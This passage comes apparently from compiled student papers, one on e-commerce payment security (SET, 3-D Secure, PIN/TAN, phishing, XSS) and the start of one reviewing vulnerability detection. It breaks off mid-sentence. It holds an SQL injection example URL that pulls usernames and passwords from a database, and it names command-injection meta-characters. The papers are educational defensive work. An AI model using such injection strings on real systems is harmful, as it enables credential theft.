key) encryptions. It uses symmetric encryption Data Encryption Standard (DES) and
asymmetric encryption to transmit session keys for DES transactions. Moreover, SET
uses session keys of 56 bits, which are transmitted asymmetrically. The rest of the
transaction uses symmetric encryption in the form of DES.
In SET, message data is encrypted using a randomly generated symmetric
key (a DES 56-bit key). This key, after, is encrypted using the message recipient’s
public key (RSA). The result is the so called “digital envelope” of the message. It
combines the encryption speed of DES with the key management advantages of RSA
public-key encryption. After encryption, the envelope and the encrypted message
itself are sent to the recipient. After receiving the encrypted data, the recipient
decrypts the digital envelope first using his or her private key to obtain the randomly
generated symmetric key and then uses the symmetric key to unlock the original
message. However, this level of using 56-bit key encryption is weak, and can be
easily cracked using powerful hardware. In the past DES cracking machines were
designed too obtain message data. Thus, this is the main problem and concern of SET
since DES encrypts the majority of a SET transaction.
Another protocol that SET uses is called use of asymmetric key - digital
signature (Message Digests). As we mentioned above, in SET, the public key
cryptography is only used to encrypt DES keys and for authentication (digital
signature) but not for the main body of the transaction. In SET, the RSA modulus is
1024 bits in length. SET uses a distinct public/private key to generate the digital
signature. Each SET members possesses two asymmetric key pairs, which is used in
the process of key encryption and decryption, and a “signature” pair for the creation
and verification of digital signatures (160-bit message digests). This algorithm makes
sure that no two different messages can have the same message digest.
241
Now let’s examine another protocol that SET uses. Let’s consider following
picture. It is the way of SET protocol making use of Dual Signature.
Figure 1: SET protocol using Dual Signature [1]
1.
In the picture above Payment Information (PI), which contains all the
information about cardholder’s card, is hashed to produce Payment
Information Message Digest (PIMD)
2.
At the same time cardholder performs hashing the Order Information (OI) to
get Order Information Message Digest (OIMD)
3.
After, both of the Information Messages Digests are being combined to get
Payment and Order Message Digest (POMD)
4.
Card holder, then encrypts the POMD with its own private key and gets Dual
Signature (DS).
5.
After obtaining Dual Signature cardholder sends:
a.
OI, PIMD, and DS to the merchant;
b.
PI, OIMD, and DS to the payment gateway;
[1]
This method ensures that merchant, who has received Order Information, Payment
Information Message Digest and Dual Signature, will not be able to find payment
information. Thus merchant cannot know the cardholder’s credit card number. But,
since merchant received Order Information, merchant will start processing the order.
At the same time, payment gateway which has received payment information will
deduct amount of money from the cardholder’s account and sends it to the merchant.
SET has advantages and lacks of the following requirements:
Confidentiality - payment info is secure but order info is not secure
Data Integrity - Uses mathematical techniques to minimize corruption or detect
malicious tamper
Client Authentication - Digital ID (certificate) is used to identify costumer and
Digital ID (certificate) is checked via the card’s Issuer
242
Merchant Authentication - Digital certificate again used as a back check for
confirming the merchant is valid
SET can work in Real Time or be a store and forward transfer, and is industry backed
by the major credit card companies and banks. Its transaction can be accomplished
over the WEB or via email. It provides confidentiality, integrity, authentication, and
non-repudiation. SET is a very comprehensive and very complicated security
protocol. It is the main protocol of ensuring privacy and security during the credit
card payment.
3-D Secure There exist another, rather new, security protocol called “3-D Secure”. It
was developed by Visa (product name is called Verified by Visa), the leading
company in handling electronic transactions. 3-D Secure is based on XML format and
is used as an additional security layer for credit and debit card transactions. Not long
enough, this protocol was adopted by MasterCard and American Express, and was
named as MasterCard SecureCode and SafeKey respectively.
3-D Secure combines online authentication process using SSL to protect credit card
information during transmission. 3-D Secure is based on 3 domain model:
1.
Acquirer Domain
2.
Issuer Domain
3.
Interoperability Domain
[2]
This protocol uses XML messages
which were sent over SSL connection
with client authentication. It makes
sure that both sides (server and client)
are authorised. 3-D Secure initiates a redirection to the client card’s bank to authorize
the transaction. In this way, bank takes the responsibilities to ensure the secure
transaction. Both parties as merchant and card holder benefit from it in their own way:
1.
Merchants get the reduction of "unauthorized transaction" chargebacks.
2.
Card Holders benefit from decreased risk of other people being able to use
their payment cards fraudulently on the Internet.
3-D Secure card issuing bank or its Access Control Server (ACS) asks a buyer for a
password that only buyer and bank know. It ensures that merchant will not be able to
know the password. This method decreases the risk in two ways:
1.
Card details will not be useful without additional password for purchasing.
Additional password is not stored or written on the card.
2.
Hackers cannot use credit/debit card information obtained from merchants,
since no additional password information will be given to merchants. There
is no way hackers can get that password.
This is the way how 3-D Secure works:
243
When an electronic transaction occurs on a 3D secure website and the cardholder is
paying using a credit/debit card enrolled in 3D secure either the MasterCard or VISA
pop up or inline frame security screens appear. The user is then asked to enter their
password (which can be a combination of letters or numbers) which is known only to
them. MasterCard or VISA then returns the user to the electronic commerce store
after authentication.
2.2 Online banking
Today, many banks are Internet only banks. Single password authentication as in
most secure Internet shopping sites, is considered to be insecure for personal online
banking applications in most countries. In order to make online banking as secure as
possible, there exist two different security methods for online banking:
•
Personal Identification Number (PIN): Single password used to logging in
and one time password (TAN): password given to authenticate transactions
•
Signature based online banking where all transactions are signed and
encrypted digitally. The Keys for the signature generation and encryption
can be stored on smartcards or ThumbDrive or any memory medium,
depending on the concrete implementation.
PIN is easy to understand criteria for a security, we will examine one time password
(TAN). TAN is the second layer of security above and beyond the traditional singlepassword authentication. TANs provide additional security due to acting as a twofactor: if hacker manages to get PIN number, he or she will not be able to perform any
operations without knowing a valid TAN. Mostly TANs are distributed using
different ways:
1.
Sending online bank user’s TAN by postal code
2.
Sending online bank user’s TAN via SMS to user’s (GSM) mobile phone
Second type of obtaining TAN is considered the most secure one since user
gets SMS with quote in it representing TAN or the transaction amount and details. In
this case TAN is valid for some short period of time. The most secure way of using
TANs is to generate them by need using a security token. These token generated
TANs depend on the time and a unique secret, stored in the security token (two-factor
authentication or 2FA).
Another security measures that all online banking websites use is secure
244
socket layer (SSL) secured connections. The SSL protocol allows client/server
applications to communicate across a network in a way designed to prevent
eavesdropping and tampering. The SSL encrypt the segments of network connections
above the Transport Layer, using asymmetric cryptography for privacy and a keyed
message authentication code for message reliability. Most of the online banking
system websites use Hypertext Transfer Protocol Secure (HTTPS) for port 443.
HTTPS is the combination of Hypertext Transfer Protocol (HTTP) and SSL/TLS. If
we examine packets sent and received in both HTTPS and HTTP protocols we can
see that messages in HTTPS are encrypted and cannot serve with any use for hackers
who obtained them.
From the picture above we can see that everything in the HTTPS message is
encrypted, including the headers, and the request/response load. From the information
provided in above picture, the attacker can only know the fact that a connection is
taking place between the two parties, already known to him, the domain name and IP
addresses.
3
Threats Faced by E-Transaction Systems
SQL Injection SQL injection is a common vulnerability as a result of lax input
validation. It is an attack on the site itself, in particular its database. The attacker takes
advantage of the fact that programmers often chain together SQL commands with
user-provided parameters, and can therefore embed SQL commands inside these
parameters. As a result, attackers can retrieve, modify or even delete data from the
database [3]. This will eventually allow sensitive data of the particular company to be
exposed to the attacker, including customers’ credit card numbers, account passwords
etc. Recently, there is a mass SQL injection attack which depends on the sloppy
misconfigurations of website servers and back-end databases have hit more than 1
million ASP. NET Web pages. Hence, it is extremely important for the organizations
to pay attention to this particular problem to prevent it from happening. Some of the
common prevention ways include looking for SQL signatures in the incoming HTTP
stream, observing the SQL communication and builds a profile consisting of all
allowed SQL queries and also monitoring a user’s activity over time and to correlate
various anomalies generated by the same user.
Eg. http://www.mydomain.com/products/products.asp?productid=123 UNION
SELECT user-name, password FROM USERS
Price Manipulation This particular vulnerability is unique to online shopping carts
and payment gateways. The cause of this vulnerability is that the total payable price is
always stored in a dynamically generated web page as shown in Figure 1 and as such,
an attacker can easily modify the amount using web application proxy. Shown below
is a picture of how the final payable price can be manipulated by the attacker before
sending the information to the payment gateway. Vulnerabilities of a similar kind has
also been found when these information are stored in a client-side cookies which can
easily be accessed and modified.
245
Figure 2: Demonstratio of Price Manipulation [4].
Buffer Overflow The overall goal of a buffer overflow attack is to subvert the
function of a privileged program so that the attacker can take control of that program,
and if the program is sufficiently privileged, the attacker will be able to control the
host. A buffer overflow occurs when a program or process tries to store more data in a
buffer than it was intended to hold. As a result, the extra information may overflow
into adjacent buffers, corrupting or overwriting the valid data held in them. This, in
turn, has become a vulnerability that attackers are able to exploit. Attackers imbed
codes designed to trigger specific actions which send new instructions to the attacked
computer in the extra data allocated to the specific buffer which could allow the
attacker to damage user’s files, change data or even disclose confidential information.
It is commonly associated with programming languages such as C and C++, which
provide no built-in protection against accessing or overwriting data in any part of
memory and do not check that data written to an array is within the boundaries of that
array. Therefore, manual bounds checking by the user are often required to prevent a
buffer overflows attack. A buffer overflow attack can be either a stack-based
exploitation which is an exploitation on the call stack, or a heap-based exploitation
which is a buffer overflow occurring in the heap data area. Besides manual bound
checking as mentioned above, other countermeasure include writing secure data,
stacking execute invalidation, relying on the help of a compiler which has built-in
safeguards that try to prevent the use of illegal addresses and dynamic run-time
checks that relies on the safety code being preloaded before an application is execute.
246
Remote Command Execution The vulnerability occurs when an attacker is allowed
to execute operating system commands due to inadequate input validation. It is
commonly found with the use of system call in Perl and PHP scripts. Problems arise
when scripts writer assume that the user will input data to their CGI program in
correct format and as a result, when a user supply some special meta-characters such
as “;”, “|” etc. in the user input data, these characters may make the scripts to do other
things other than the scripts originally intended. Successful exploitation of the
vulnerability may result in the ability to execute arbitrary commands with elevated
privilege of the web server.
Weak Authentication and Authorization An attacker can use tools to attack
authentication system which do not prohibit multiple failed log in or website that uses
HTTP Basic Authentication or session IDs that are not being passed over Secure
Socket Layer. Brute force method can be applied to the attacks if the algorithm
involved is simple as one can write a Perl script to enumerate through the possible
session ID space and break the application's authentication and authorization schemes
Phishing It’s pronounced the same way as fishing, is similar to the popular sport
whereby the fisherman cast a hook with fish food of hoping that some unsuspecting
fish would bite the bait. In the case of phishing, the hacker poses as a trusted source;
the hacker tries to lure unsuspecting victims to enter illegitimate websites where
oblivious user would enter their personal information into the illegitimate websites.
General Internet user have the misconception that phishing scams could only be
conducted by means of fraudulent email that redirects user to illegitimate website,
thus giving them a false sense of security that they are safe as long as they avoid
clicking any links in email. However, that is not the case as there are many ways other
ways in which phishing scam is conducted and it is important to know these technique
to be able to safeguard our personal information. We will explore a couple of phishing
scams that are commonly used.
Filter Evasion
Conventional phishing scams are done using a combination of texts and images.
However, the prevalence of spam filter subjects phishing mail to greater scrutiny as
the spam filter is able to detect any text-based phishing contents and thus these mail
are filtered out from the mailbox. As a result, hackers are turning into the uses of
images to replace text that contains the phishing information, thereby bypassing the
filter mechanism.
Website forgery
This is the most commonly known form of phishing in which the hacker would create
a fake website that looks identical to a legitimate website; in terms of website design
with only slight variation in the URL. Identification of a forged website is easy; user
could compare the URL of trusted website to the suspected website or using web
browser that supports anti-phishing measure that alerts user to known phishing sites.
Unfortunately, while security features evolved to meet changing security needs,
phishing techniques have also evolved to counter security measures in place. Website
forgery has evolved; hackers have come up with ingenious to exploit on the user
247
common perception that a website is safe from forgery as long as the URL of the site
matches those of a legitimate site. This is achieved by means of a Javascipt that runs
when users click on a link which redirects them to a phishing website; the Javascript
suppresses the address bar and replaces it with a fake address bar, which displays the
address of the trusted website rather than the address of the phishing site [5].
Tabnabbing
This is a term coined by Aza Raskin, creative lead of Firefox, on his blog where he
demonstrated a proof-of-concept on this new phishing technique. According to
Raskin, this technique works on the tabbed features provided by most browsers. It
begins when a user enters a normal looking website (where the phishing scripts are
going to run) and then for whatever reason, he decides to navigate away from the
current tab to open up a few other tabs. During this time, the scripts running on the
phishing site detect inactivity on the page and then begin running codes that replace
the site contents; favicon, title and appearance to something a user would be familiar
with. Take for example, a bogus Gmail website requesting for login information,
which looks very similar to the legitimate website. When the user browses through
the open tabs he chances upon the familiar Gmail favicon, and as described by Raskin
that "memory is malleable and moldable", the user assume that he has indeed open the
Gmail tab and unsuspectingly enters his login information into the phishing site. This
attack could be extended to other form of web services, most notably social
networking sites, bank websites and ecommerce websites. Furthermore, Raskin stated
that the attack could be customized to detect web services accessed by the victim and
then generate web pages dynamically to fit the user [6].
Pop-up on legitimate website
This attack targets the vulnerability of javascript pop-up found in web browser where
dialog boxes bearing no information of their origin could to be opened. The scam
begins with the user clicking on a link from a malicious website or email. The link
then directs the user to a legitimate website thereafter a pop-up requesting for login
information would appear as an overlay on the legitimate website. A similar variation
of this attack known as session phishing, involved the use of a malware that injects
malicious code into browser. The attack begins with the user logging into a legitimate
banking site, then the malware detects the web service accessed and then display a
pop-up prompt claiming that the session has expired and request for user input to
renew the session. Both of these attacks have a higher rate of success as the attack
happens on the legitimate website and thus user who receive these unauthorized
prompt have the tendency to to perceive that the request is legitimate.
Evil twin
Evil twins are wireless network created by phishers with the intention to confuse user
by offering access points that have the same name as legitimate access points; thereby
creating a confusion in hope of luring unsuspecting users to access the rouge network.
This attack is common in places where wireless hotspots could be found. The phisher
begins by scanning an area for an access points to target, then impersonate the access
point. Unsuspecting user accessing the rogue network are fooled to believe that they
are in legitimate network and thus believe that their transaction are secure; in actual
248
fact the integrity of their data has been compromised as the information are routed to
the illegitimate network. The setup of the bogus network is relatively simple and
undetectable; phisher could setup an evil twin wireless network using a laptop and
could easily shutdown the network when he feel that his identity is compromised.
Pharming It is very much similar to phishing; both uses bogus website and attempt to
steal personal information from their victims. The main difference between these
methods is that while majority of phishing scams could be detected when one pays
close attention to discrepancies in web address whereas pharming is able to redirect
legitimate web traffic to an illegitimate site regardless of whether the user input the
correct address. Thus, pharming is a lot harder to detect than phishing.
This redirection of web traffic could be achieved by means of Trojans,
worms or viruses that are capable of attacking the address bar of web browser such
that valid addresses to legitimate website are modified to illegitimate ones. Another
method of redirection of web traffic would be DNS poisoning. This attack takes
advantage of the fact that DNS has no means to validate the integrity of data received
and that data in DNS are cached to achieve optimization. The hacker then corrupts the
DNS server by introducing incorrect entries; these entries spoof legitimate address of
entries in the DNS server and redirects them to a server he controls. As a result, web
request to legitimate website are redirected to bogus website set up by the hacker.
Cross-site scripting Cross-Site Scripting (XSS) is an attack techniques targeting web
browser on the client-side; XSS attack exploits the vulnerability of web applications,
which allow attacker to inject client-side scripts into users' web browser. These
scripts, when injected and ran on the client browser, are able to carry out malicious
act; recording of keystrokes, stealing of history, accessing session cookies and many
others. XSS attacks could be categories under two main categories namely, Persistent
and Non-persistent.
Non-persistent
A non-persistent XSS attack begins with the hacker attempt to identify a flaw in a
trusted website that is susceptible to XSS attack. Once an attack vector has been
identified, the hacker then begins scripting an attack to exploit the vulnerability of the
vector identified. The completed scripts are inserted into a specially crafted link. This
seemingly harmless link contains a URL mapping which points to the trusted website
and also the malicious script that will run on the client browser when clicked. The
hacker then begin spreading the link he had crafted through websites, forum and
email spams. Due to the fact that the crafted link points to the trusted website, it is
likely to deceive even the more experienced user to access the link with no knowledge
that an attack is taking place. Fortunately, non-persistent XSS attack could be avoided
easily; a general rule of thumb for user for user accessing sensitive information on the
web would be to avoid clicking on unsolicited links and only access trusted web
pages through well-formed URL entered by the user.
Persistent
249
Unlike a non-persistent XSS attack, a persistent XSS attack does no require the
creation of a crafted URL to carry out the attack. In the case of a persistent XSS
attack, the hacker would first begin by creating a exploit code could be created using
Javascript or any other scripting language. After which, the attack code is submitted
to web sites where the code could be stored for an extended period time and accessed
by many visitors; common area where attack codes could be submitted are forums,
wikis, blog comments, user reviews and many other locations [7].When users access
the "infected" pages containing the exploit code, the code executes itself
automatically; giving the user no chance to defend against the attack. A persistent
XSS attack is dangerous and hard to defend against. Firstly, because hackers are able
to carry out the attack stealthily; take for example, the content within the <script> tag
does not display itself in the webpage and thus it is difficult for user to detect whether
a particular page is "infected". Secondly, the fact that exploit code are stored in the
server would mean that it could exist indefinitely until it is removed, thus, it has a
greater chance of infecting user. The situation is worsen by the fact that website with
high traffic yield are usually targeted in persistent XSS attack, thus, it is able to infect
many users in a relatively short amount of time.
4
Analysis on current system
SET Protocol Despite the undisputed recognition of SET’s importance in ecommerce security, there are, however, still defects in the current protocol. Firstly,
SET protocol does not specify how to preserve or destroy the data after every
transaction, or determine where the data should be saved. As a result, it may become a
vulnerability that a hacker can simply attack. Besides that, it also does not solve the
dispute between the involving parties, namely cardholder, merchant, issuer, acquirer,
payment gateway and center of the certification. Hence, whenever there is a dispute,
SET does not have any rule to help or solve the situation. The problem is further
highlighted with the lack of time information in the current protocol as it does not
record the time while the transactions are being processed. This particular information
can be useful whenever there are disputes as it can provide legal evidences. Last but
not least, there is also the concern of using a weak 56 bit DES due to the
computational cost of asymmetric encryption (IBM, 1998).
Hence, there have been several suggestions which can help to improve the
current protocol. First and foremost, a data destruction mechanism can be included
into the current protocol such that it will help to ensure sensitive data are destroyed
after the transaction, and will only save a copy in the storage server for further
reference. It will help to make sure that those data cannot be found in the computers
of involving party, but only accessible through the storage server. In addition, this
specific mechanism can also be used to record other useful information such as the
transaction time which may be useful to different parties as mentioned above. (The
Improvement of SET Protocol based on Security Mobile Payment, 2011)
PIN/TAN System The PIN/TAN system is an authentication scheme which has been
widely used in the e-commerce world nowadays, especially when it comes to internet
250
banking. Some banks have even taken a step further by providing a TAN generator
token for the users, which can reduce the risk of compromising the entire TAN list.
However, this does not solve the problem that unfortunately, the PIN/TAN system is
inherently insecure as brought out by several students from a university in Germany
(Outflanking and securely using the PIN/TAN system). It has been proven that one
does not need to have any special hacker skills, but only need just some experience
with online banking and some basic programming knowledge to perform the attack.
Basically, the attack require the attacker to infect the target’s system with a computer
virus or a Trojan containing a spy that lurks hidden in the background and eavesdrops
on the computer’s hardware input (keyboard and mouse) to obtain the required
information, which are the account number, the PIN and finally the TAN. Once all
these sensitive data have been acquired, the spy closes the web browser before the
TAN is sent to the bank server to ensure that the TAN stays valid and finally, the
attacker can just use all the stolen information to transfer money from the target’s
account. This attack is made possible for several reasons. One of them is due to the
fact that those sensitive data are typed in clear text into the computer which has
allowed the attacker to acquire valid authentication data by just stealing the target’s
input. Besides of that, the PIN/TAN system is not immune to common internet threat
such as phishing.
3-D Secure 3-D Secure is designed as an extra layer of security for online transaction
involving debit and credit card. Despite all the better security claims made by Visa,
the developer of the protocol, it has several well-known flaws which has caused it to
come under attack in numerous occasions. Nevertheless, it’s probably the largest
single sign-on system ever deployed. Its first and maybe the most fatal weakness is
none other than the 3DS form, which is an iframe of pop-up without an address bar.
In this case, a customer is not able to verify where the form has come from. This is
going against the advice given to the public on how to prevent phishing attacks and
also makes attack against 3DS easier (eg. Man-in-the-middle attack). Its second
weakness is the activation during shopping (ADS) mechanism in which customers are
requested to fill in an ADS form to verify that he is the authorized cardholder. As a
result of this, it is easy for an attacker to impersonate the ADS form and request all
those sensitive data from the customer while from the customer’s perspective, it is
merely an online shopping website asking for personal details. Besides that, there is
also a mechanism which helps the customer to verify that he’s talking to the actual
bank by displaying a certain phrase he has chosen during the ADS process. However,
this specific mechanism has allowed 3DS to be even more vulnerable to a MITM
attack. (Verified by Visa and MasterCard SecureCode: or, How Not to Design
Authentication)
5
Different Ways to Pay Online
Disposable Credit Cards Disposable credit card has been around for quite some time
but many are still unaware of its existence. American Express was the first bank to
introduce it in September 2000 [8]. Subsequently, many other banks also offer
disposable credit card, yet it is not widely known or utilized since it's adoption. These
disposable credits cards could be applied from any banks that offers them and
251
customer could apply for a number of these cards under one credit card account.
These disposable cards could then be for different merchants for the e-transaction.
The main idea behind the use of disposable credit card is that these cards functions as
aliases to your original credit card; such that in the event that one of the disposable
credit card are compromised, the hacker would not have any knowledge of your
original card number. Disposable credit seems to be a plausible choice to secure etransaction but yet it is not widely used. One of the reason could be due to
administrative procedures involved in maintain these cards; there is a need to renew
the cards on an annual basis and when we take into consideration that a user could
own a number of these cards, the trouble involved in maintaining the cards offsets the
benefits it provides.
Prepaid Credit Cards A prepaid credit card is similar to any other prepaid card;
allowing user to make purchases using pre-loaded sum of money in the card. There
are two different forms of prepaid credit card: a "reloadable" and "non-reloadable"
card, the former allow user to add additional funds to the balance of the card while the
latter does not allow. These prepaid credit cards could be purchased without a bank
account or credit card and user are able to make purchases using the value stored in
the card, which functions the same way as an actual credit card (except the fact that it
does not provide purchases on credit). This method of payment minimizes the loss
incurred by the user in the event that the card number has been compromised.
Furthermore, Visa's zero-liability policy, which protects user from unauthorized
charges on their cards, are also applicable to prepaid cards. An interesting point to
note would be the underlying cost associated with the use of these card which
includes the cost of adding value to the card (reloadable cards) and the cost of the
card itself(non-reloadable cards) [9].
MasterCard SecureCode SecureCode is a service provided by MasterCard to
improve on e-transaction security; it seeks to protect against the unauthorized use of
credit cards on participating online retailers [10]. All MasterCard holders could
register their existing credit or debit card for this service and receive their SecureCode
upon completion. When a user confirms his purchase on an e-commerce site that
offers this service, the user is prompted to input his SecureCode; this SecureCode is
unique to the user and it serves to verify the user identity and before allowing the
transaction to take place. An additional feature SecureCode provide is to act as a
medium between the customer and retailer, meaning that customer credit card number
is not revealed to the merchant during the transaction. However, SecureCode has its
limitation; it is only applicable to participating online retailers who have opted to
implement SecureCode on their transaction system. Thus, users choices are limited by
the list of participating merchants and the coverage of this service would remain
limited unless more retailer decide to implement SecureCode.
Online Payment Services Online payment services such as Google
Checkout(checkout.google.com) and Amazon Payments(payments.amazon.com) are
simply web services that handles transaction between customer and online retailer.
One might argue on the necessity of having these middleman websites to handle
252
transaction when it could already be done on the retailer website. It is true to some
extent that this site does indeed seemed to just handle transaction, but we must also
take note of the underlying security features these site offers that could better protect
our credit card information. When users sign up for any one of these payment
services, the users must first have a certain level of trust on the reliability of the web
service in securing his data. By entrusting the sites with personal information, the
users leverage on the expertise and security technologies implemented on these sites
to carry out secure transaction, or to put it in another way: we could also say that there
is a shift in security responsibility from the users to the payment website. Transaction
carried out using payment website are safer in the sense that user credit card
information are not exposed to the merchants during the payment process, thus the
confidentiality of the credit card numbers are preserved. However, we must also be
aware that by using these websites, we are making the assumption that the owners of
the services are protecting our personal information to the best of their ability, which
might not be the case.
6
Conclusion
Electronic transaction has already become an integral part of the commerce system
nowadays. Banking institutions and companies worldwide have jumped onto the
wagon in hope of reaping huge financial benefits from the current systems. As a
result, the security of such systems has become more of a concern to the different
parties involved. However, we observed that there is no existing system which can be
considered fully secure. All these systems and protocols have their own strengths and
weaknesses. In fact, there are many companies have been taking proactive efforts to
develop better and more secure systems. Therefore, improved systems and protocols
are expected to be developed and used in the future.
253
7
References
1. Atul Kahate: Security and Threat models – Secure Electronic Transaction Protocol
(2008)
http://www.indicthreads.com/1496/security-and-threat-models-secure-electronictransaction-set-protocol/
2. 3-D Secure
http://www.web-merchant.co.uk/optimal%20technical%20data/3D_secure_Guide.pdf
3. SQL Injection
http://dev.mysql.com/tech-resources/articles/guide-to-php-security-ch3.pdf
4. Common Security Vulnerabilities in E-Commerce System
http://www.symantec.com/connect/articles/common-security-vulnerabilities-ecommerce-systems
5. British Broadcasting Corporation (BBC): Phishing con hijacks browser bar (2004).
http://news.bbc.co.uk/2/hi/technology/3608943.stm
6. Raskin, A.: Tabnabbing: A New Type of Phishing Attack (2010),
http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/
7. Fogie, S., Grossman, J., Hansen, R., Rager, A., & Petkov, P.:
XSS Attacks (2007). pp. 75,
http://books.google.com/books?id=dPhqDe0WHZ8C&hl=en
8. Linsey, R.: Disposable Credit Card Numbers (2001).
http://www.cardratings.com/feb01new.html
9. White, M.C.: Credit Cards for Kids? Don’t Be Childish
(2011). http://moneyland.time.com/2011/10/25/why-parentsshouldnt-give-their-kids-a-credit-card/
10. MasterCard: Support SecureCode™ FAQs.
http://www.mastercard.us/support/securecode.html
11. Secure Electronic Transactions (SET).
http://searchfinancialsecurity.techtarget.com/definition/SecureElectronic-Transaction
12. Electronic Transaction.
http://netlab.cs.iitm.ernet.in/cs648/2009/assignment1/rajan.pdf
254
13. Ganesh Ramakrishnan: Secure Electronic Transaction (SET) Protocol
http://www.isaca.org/Journal/Past-Issues/2000/Volume-6/Pages/Secure-ElectronicTransaction-SET-Protocol.aspx
14. 3-D Secure
http://www.3dtrust.com/
15. 3-D Secure Integration
http://www.advansys.com/default.asp/p=87/3D_Secure
16. Secure Online Banking
http://www.nationwide.com/secure-online-banking.jsp
17. Buffer Overflow
http://searchsecurity.techtarget.com/definition/buffer-overflow
18. The improvement of SET Protocol based on Security Mobile Payment
http://www.aicit.org/jcit/ppl/03_10.4156jcit.vol6.issue7.3.pdf
19. Analysis of SET and 3-D Secure
http://www.58bits.com/thesis/3-D_Secure.html#_Toc290908626
20. SET Criticism
http://www.wolrath.com/set.html#3.4.1_Delays,%20_delays,_delays_!
21. Improving the Secure Electronic Transaction Protocol by Using Signcryption
http://www.signcryption.org/publications/pdffiles/HanaokaZhengImai-e84a_8_2042.pdf
22. Secure Electronic Transactions: An Overview
http://www.davidreilly.com/topics/electronic_commerce/essays/secure_electronic_tra
nsactions.html
255
256
A Review of the Techniques Used in Detecting Software
Vulnerabilities
Nicholas Kor, Cheng Du
National University of Singapore
Abstract. This paper reviews a few common methods of detecting software
vulnerabilities and their use in detecting the presence of some of the more
prevalent vulnerabilities. We also survey methods used to mitigate the amount
of damage that can be done by a program.
1
Introduction
Vulnerabilities present in the design of programs allow attackers to reduce the
integrity, assurance and availability of the program through exploitation. By careful
analysis of the program code for vulnerabilities, the likelihood of the successful
malicious exploitation of the program will be greatly reduced. This goes on to result
in a more secure and stable program as well as maintaining the health of the rest of
the system that interacts with it.
In this paper we outline common methods of testing programs for
vulnerabilities and their use in detecting the presence of a few of the more common
vulnerabilities present in software. We also go on to review methods used to prevent
compromised programs from damaging the systems they reside in.
257
2
2.1
Detecting Vulnerabilities in Software
Code Review
Code review at its simplest is an examination of the code by the author or someone
else to find faults, both security related bugs and non-security related bugs, in the
code and repair them. There are a few types of code reviews with varying levels of
formality and manpower involved, describing the different types are outside the scope
of this paper. Static code analysers, which have a section of their own in this paper,
are also often used in large projects to aid in the checking of known vulnerabilities.
While checking that the code does what it is supposed to do is pretty obvious and
routine, checking that the code only does what it is supposed to and nothing more is
less so. The additional “and nothing more” requirement ensures that the code is
1
checked for functionality and security .
Evidence suggests that code review can be more effective than dynamic
testing, which is the testing of software through execution of test data. For example, a
software engineering researcher, Jones2 summarized the data in his large repository of
project information to paint a picture of how reviews and inspections find faults
relative to other discovery activities. Because products vary so wildly by size, the
table below presents the fault discovery rates relative to the number of thousands of
lines of code in the delivered product. The numbers below seem to indicate that code
review outstrips all other forms of fault detection, in the number of faults found.
Table1. Faults found during discovery activities.
Discovery Activity
Requirements review
Design review
Code inspection
Integration testing
Acceptance testing
Faults found (Per thousand lines of code)
2.5
5.0
10.0
3.0
2.0
Of course, the effectiveness of code review in detecting vulnerabilities depends highly
on the skills of the reviewer. Ideally, the reviewer should possess computer security
expertise in addition to being a competent programmer and familiar with the source
code. However, not all organisations have the luxury of recruiting people with the
needed computer security skills and this may cause the security of the software to be
neglected when the code is reviewed.
258
2.2
Using Automated Tools
Automated tools can be used to aid the detection of software vulnerabilities. Static
program analysers are able to detect bugs in code, such as the presence of memory
leaks. Lint3 is a classic example of a static analyser used to detect errors in C source
code.
Some static analysers can provide analysis of the behaviour, typically the
control-flow and data-flow, of the program and the translation of its behaviour to a
representation that is can be easily understood by a reviewer. This function is
especially valuable to a reviewer who is not part of or is new to the development
team, with no prior knowledge of the code, as it helps him understand the code in a
shorter amount of time.
Other static analysers can also be configured with the express function of
finding software vulnerabilities, such as detecting the use of unsafe and deprecated
library functions.
As with any man-made tool, static analysers are never perfect and even the
better written ones produce false positives, wrongly reporting acceptable code as
being vulnerable, and false negatives, failing to detect vulnerable code, from time to
time, necessitating the need for the manual verification of the warnings given. Thus
such automated tools should be used in conjunction with code reviews and code
testing and never as a standalone.
2.3
Negative or Non-Functional Testing
Testing of code is an integral part of the software development process. The code is
usually subjected to different levels of testing, including unit testing where each
module of the code is tested for functionality, integration testing, where the code is
tested after integrating two or more of its component modules, and regression testing,
where code is tested after a version change to ensure that the enhancement of the
system or the fixing of bugs does not introduce new bugs.
Negative testing4 however, involves verifying the stability of the program by
checking the results of providing invalid or malformed data as input. Causing the
program to crash or an unhandled exception could indicate the presence of
vulnerabilities. The test data should also be fed in all of the ways the program accepts
information, be it command line arguments, input boxes or even network packets.
This is in line with the earlier concept of checking that the program only does what it
should and nothing more. In later parts of this paper, we will present examples of how
negative testing can be used to reveal the presence of some of the more common
vulnerabilities in code.
One specific type of negative testing is fuzz testing 5, where the test data is
randomly generated. This saves time by automating the generation of test cases, but a
259
possible disadvantage of using this method of testing would be that rare boundary
cases that do not arise during normal operation of the program may go undetected. To
remedy this, special test cases targeting these boundary cases can be crafted to be
used in conjunction with the random test inputs.
3
3.1
Common software vulnerabilities and security faults
Buffer Overflows
Buffer overflows are software faults that occur when the amount of data being written
to a buffer is more that what the buffer can contain. The data overflows the buffer and
overwrites the memory following the end of the buffer. When used as an attack
vector, the area of memory following buffer to be overrun is usually determined by
the attacker to have some special significance, for example, containing system code
that he can overwrite or a return address which he can replace. The attacker then uses
this vulnerability to inject his own code in to the memory area of interest, typically
with the aim of running his chosen programs with higher privileges.
The C programming language is particularly susceptible to buffer overflows
as it does not bounds check buffers and because many of the functions provided by
the standard C library unsafe, where the programmer needs to explicitly confirm that
the size of the data being read is always smaller than the buffer it will be written to 6.
Some of the unsafe library functions are the strcpy, strcat, gets and sprint functions 7,8.
The detection techniques outlined in the previous sections can be applied to
detect for the presence of buffer overflow vulnerabilities. For example, the use of
these unsafe functions can be spotted during code review and the code can be
rewritten to use safe versions of these functions, if available, or rewritten to use the
functions in a safe manner. This process can also be automated through the use of
static code analysers or other similar tools. Splint9, a tool for statically checking C
programs for security vulnerabilities and coding mistakes, can be configured to detect
if the unsafe library functions are used. Splint can also be used in conjunction with
annotated pre and post-conditions in the source code to detect if the function calls are
being used in a safe manner, if these functions absolutely have to be used.
3.2
Failing to handle invalid inputs
The failure to or the improper handling of invalid inputs is a recipe for disaster. Here
we outline two specific software vulnerabilities falling in this class of software faults,
both of which stem from or can be exploited by not handling specially crafted user
input.
260
3.2.1 Uncontrolled Format String
Most programming languages include functions to format data for output. In most
languages, the formatting information is described using some sort of a string, called
the format string. The vulnerability arises when programmers use data from external
untrusted sources directly as the format string10. As a result, attackers can enter format
strings as input to the program, causing many problems.
The C programming language is one of the languages that use formatting
strings, in the printf family of functions, making it susceptible to this type of exploit.
Take for example the statement,
